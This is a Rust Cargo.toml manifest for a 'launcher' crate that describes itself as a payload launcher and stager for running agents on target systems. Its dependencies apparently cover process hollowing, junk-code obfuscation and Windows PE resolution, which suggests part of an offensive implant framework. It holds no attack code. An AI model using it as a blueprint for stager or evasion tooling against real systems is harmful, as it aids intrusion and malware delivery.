[package]
name = "launcher"
description = "Payload launcher and stager for executing packaged agents on target systems"
version.workspace = true
edition.workspace = true
license.workspace = true

[dependencies]
junk_macro = { path = "../junk_macro" }
rand = "0.8"
common = { path = "../common" }
hollowing = { path = "../hollowing" }
tokio = { workspace = true }
reqwest = { workspace = true }
clap = { workspace = true }
anyhow = { workspace = true }
base64 = { workspace = true }
tracing = { workspace = true }
tracing-subscriber = { workspace = true }
sha2 = { workspace = true }
hmac = "0.13"
hkdf = "0.13"

[target.'cfg(target_os = "linux")'.dependencies]
libc = "0.2"

[target.'cfg(target_os = "macos")'.dependencies]
libc = "0.2"

[target.'cfg(target_os = "windows")'.dependencies]
pe_resolve = { path = "../pe_resolve" }

[dev-dependencies]
tempfile = "3"
axum = { version = "0.7", features = ["http1"] }
tower-http = { version = "0.5", features = ["fs"] }
assert_cmd = "2"
predicates = "3"
tokio = { workspace = true }
